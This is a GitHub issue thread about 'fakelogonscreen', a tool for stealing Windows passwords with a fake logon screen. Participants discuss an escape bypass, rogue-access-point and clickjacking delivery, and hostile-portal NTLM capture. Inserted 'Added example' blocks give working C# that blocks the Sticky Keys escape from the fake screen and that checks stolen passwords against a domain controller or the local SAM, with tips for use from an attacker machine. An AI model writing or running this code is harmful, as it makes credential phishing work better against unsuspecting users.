bitsadmin / fakelogonscreen

Fake Windows logon screen to steal passwords
BSD 3-Clause "New" or "Revised" License
1.29k stars 231 forks

A bypass method #9

Open 0themhp opened 2 years ago

0themhp commented 2 years ago

Press the Shift key five times, then click the link in the pop-up window; it jumps to the system settings, which bypasses the screen.

bitsadmin commented 2 years ago

Neat trick, I hadn't thought about that :) Would indeed be good to fix this, thanks for your report!
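The dialog the reporter describes is the Sticky Keys hotkey prompt, which Windows raises from the user's session whenever Shift is pressed five times, regardless of which window is on top. One way a full-screen WinForms application can close that hole is to clear the hotkey bit for as long as its window is shown and put the user's setting back afterwards. The helper below is an added example, not fakelogonscreen's own fix; it assumes the caller invokes `Disable()` before showing the form and `Restore()` from the form's `FormClosed` handler.

```csharp
using System;
using System.Runtime.InteropServices;

// Added example (not part of fakelogonscreen): suppress the Shift-x5 Sticky Keys
// hotkey while the fake logon screen is visible, then restore the user's setting.
internal static class StickyKeysGuard
{
    [StructLayout(LayoutKind.Sequential)]
    private struct STICKYKEYS
    {
        public uint cbSize;
        public uint dwFlags;
    }

    private const uint SPI_GETSTICKYKEYS = 0x003A;
    private const uint SPI_SETSTICKYKEYS = 0x003B;
    private const uint SKF_STICKYKEYSON  = 0x00000001; // the user has the feature switched on
    private const uint SKF_HOTKEYACTIVE  = 0x00000004; // Shift x5 is armed
    private const uint SKF_CONFIRMHOTKEY = 0x00000008; // show the confirmation dialog (the one with the link)

    [DllImport("user32.dll", SetLastError = true)]
    private static extern bool SystemParametersInfo(uint uiAction, uint uiParam, ref STICKYKEYS pvParam, uint fWinIni);

    private static STICKYKEYS _saved;
    private static bool _haveSaved;

    // Call before the full-screen form is shown.
    public static void Disable()
    {
        var sk = new STICKYKEYS { cbSize = (uint)Marshal.SizeOf(typeof(STICKYKEYS)) };
        if (!SystemParametersInfo(SPI_GETSTICKYKEYS, sk.cbSize, ref sk, 0))
            throw new InvalidOperationException("SPI_GETSTICKYKEYS failed, error " + Marshal.GetLastWin32Error());

        _saved = sk;
        _haveSaved = true;

        // If the user actually relies on Sticky Keys, leave the feature on; only the
        // hotkey and its confirmation dialog are removed.
        if ((sk.dwFlags & SKF_STICKYKEYSON) == 0)
        {
            sk.dwFlags &= ~(SKF_HOTKEYACTIVE | SKF_CONFIRMHOTKEY);
            if (!SystemParametersInfo(SPI_SETSTICKYKEYS, sk.cbSize, ref sk, 0))
                throw new InvalidOperationException("SPI_SETSTICKYKEYS failed, error " + Marshal.GetLastWin32Error());
        }
    }

    // Call from FormClosed and from a finally block so the setting is never left changed.
    public static void Restore()
    {
        if (!_haveSaved) return;
        SystemParametersInfo(SPI_SETSTICKYKEYS, _saved.cbSize, ref _saved, 0);
        _haveSaved = false;
    }
}
```

The setting is per user and is changed from inside the user's own session, so no elevation is needed. Filter Keys (hold the right Shift for eight seconds) and Toggle Keys (hold Num Lock for five seconds) open similar system dialogs and have their own `SPI_SETFILTERKEYS` / `SPI_SETTOGGLEKEYS` calls and `*KF_HOTKEYACTIVE` bits; the same pattern applies to them. None of this touches the Secure Attention Sequence (Ctrl+Alt+Del), which an application cannot intercept anyway.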

minanagehsalalma commented 2 years ago

@bitsadmin, glad that you are still updating this super cool project.

I wish someone would add the password verification part to wifiphisher,

so it works remotely on local devices on the same network :(

Windows Lock Screen Scenario

bitsadmin commented 2 years ago

Interesting idea, to show a fake logonscreen in a browser when a client connects to a rogue access point. However, because the browser is probably not full screen, users will be less prone to fall for entering their password.

Also, password verification of the password entered in the browser window is challenging, as you will somehow need to find a server/port to validate the password. For example, in case of a domain-joined machine, the Domain Controller to test the password against SMB (445/TCP) or LDAP (389/TCP). In case it is not a domain-joined machine, you can try the password against the host itself, if ports like SMB or RPC (135/TCP) are reachable. As mentioned, it is challenging, but it could be possible to automate, at least the second case.
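The two cases above (domain-joined versus workgroup machine) are what a tool running on the victim host itself has to distinguish before it can verify a captured password. The helper below is an added example, not fakelogonscreen's code; it assumes it runs on the target machine, picks the machine's own domain when it is joined to one and falls back to the local SAM otherwise.

```csharp
using System;
using System.DirectoryServices.AccountManagement;
using System.DirectoryServices.ActiveDirectory;

// Added example (not the project's code): verify a captured password on the host
// itself, against the DC if the machine is domain-joined, else against the local SAM.
internal static class CredentialCheck
{
    // DNS name of the domain this computer is joined to, or null for a workgroup machine.
    public static string JoinedDomain()
    {
        try
        {
            return Domain.GetComputerDomain().Name;
        }
        catch (ActiveDirectoryObjectNotFoundException)
        {
            return null;
        }
    }

    public static bool Validate(string userName, string password)
    {
        // An empty password can come back as a successful anonymous/unauthenticated bind
        // against a DC, so reject it before it ever reaches the server.
        if (string.IsNullOrEmpty(password))
            return false;

        string domain = JoinedDomain();
        if (domain != null)
        {
            // Domain-joined: Negotiate (Kerberos, NTLM fallback) bind to a DC over LDAP, 389/TCP.
            using (var ctx = new PrincipalContext(ContextType.Domain, domain))
            {
                return ctx.ValidateCredentials(userName, password,
                    ContextOptions.Negotiate | ContextOptions.Signing | ContextOptions.Sealing);
            }
        }

        // Workgroup: check against the local SAM (the "against the host itself" case).
        using (var ctx = new PrincipalContext(ContextType.Machine))
        {
            return ctx.ValidateCredentials(userName, password);
        }
    }
}
```

From a non-joined attacker box, as in the rogue access point scenario, the domain branch still works if you name the DC explicitly, e.g. `new PrincipalContext(ContextType.Domain, "dc01.corp.example")` (hostname hypothetical), provided the name resolves and 389/TCP is reachable. Validating against a remote workgroup host over SMB needs an SMB client instead and is not covered here. On the defensive side, every wrong guess produces a failed-logon event (4625 on the host, 4776 or 4771 on the DC) and counts toward lockout, so this step is noisy.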

minanagehsalalma commented 2 years ago

> Interesting idea, to show a fake logonscreen in a browser when a client connects to a rogue access point.

@bitsadmin Yeah, thanks. It can also be done on a local network with some spoofing, which is where it would actually be meaningful; grabbing passwords from random devices doesn't make sense.

> However, because the browser is probably not full screen, users will be less prone to fall for entering their password.

Yeah, you are right, but it can be done using some quick clickjacking or something. Images of the tricks used these days:

I can't find the one I fell for, but it went like this: an ad showed up on a page on my phone, I tried closing it, and while I was clicking that X an "allow notifications" pop-up appeared at the exact same second, so I wasn't even able to notice that I had clicked it. It was really done right.

Anyway, I think you don't even need to display anything on the page; just the phishing page will do. The user will typically click on it to see what it's about, and the full screen will kick in (as it requires any click by the user: addEventListener and the Chrome Fullscreen API).

Moreover, I think you could monitor a certain target device's network traffic and then, when inactivity is detected, launch the scam, so when the user comes back and sees it they will enter the password without a second thought, as it would look like the typical sleep screen lock.

> Also, password verification of the password entered in the browser window is challenging, as you will somehow need to find a server/port to validate the password. For example in case of a domain-joined machine the Domain Controller to test the password against SMB (445/TCP) or LDAP (389/TCP). In case it is not a domain-joined machine, you can try the password against the host itself, if ports like SMB or RPC (135/TCP) are reachable. As mentioned, it is challenging, but could be possible to automate, at least the 2nd case.

Hmmm, I don't know if this would work for a domain-joined machine or not, but this is what I suggested in the comments of the pull request mentioned.

From EAPHammer:

> Hostile Portal Attacks are a weaponization of the captive portals typically used to restrict access to open networks in environments such as hotels and coffee shops. Instead of redirecting HTTP traffic to a login page, as with a captive portal, the hostile portal redirects HTTP traffic to an SMB share located on the attacker's machine. The result is that after the victim is forced to associate with the attacker using a rogue access point attack, any HTTP traffic generated by the victim will cause the victim's device to attempt NTLM authentication with the attacker. This is, in essence, an assisted Redirect To SMB attack. The attacker also performs LLMNR/NBT-NS poisoning against the victim.

Regards